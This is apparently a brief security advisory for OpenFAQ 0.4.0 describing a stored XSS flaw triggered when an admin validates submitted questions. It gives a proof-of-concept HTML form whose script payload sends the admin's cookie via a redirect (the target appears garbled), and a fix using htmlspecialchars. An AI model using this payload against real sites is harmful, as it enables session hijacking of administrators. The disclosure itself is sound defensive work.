Script: OpenFAQ Version: 0.4.0 previous version probably too. Language: PHP Problem: HTML injection and XSS (Cross Site Scripting) Vendor: Discovered by: Kamil 'K3' Sienicki Description: OpenFAQ is a PHP application that lets Webmasters administrate a Frequently Asked Questions section on their Web site. It has an admin section for easily adding questions and answers and editing the general configuration. Problem: A remote user can send via form a specially crafted data. When admin try to validate questions in administration panel, specially crafted data will be executed. Example exploit: <form action=http://host/openfaq-0.4.0/submit.php?ask=go method=post> <input type=text name=q value="<SCRIPT>document.location=' value='+escape(document.cookie)</SCRIPT>"> <input type=hidden name=email> <input type=submit value=Submit> </form> Example fix: file validate.php 35 while ($row = mysql_fetch_array($get_new)) { 36 echo "<b>".htmlspecialchars($row[question])."</b> (<a href=delete.php?type=n&id=$row[id]>$lang[delete]</a>, <a href=edit.php?type=n&id=$row[id]>$lang[editpublish]</a>)<br />"; 37 } 38 } -- Kamil 'K3' Sienicki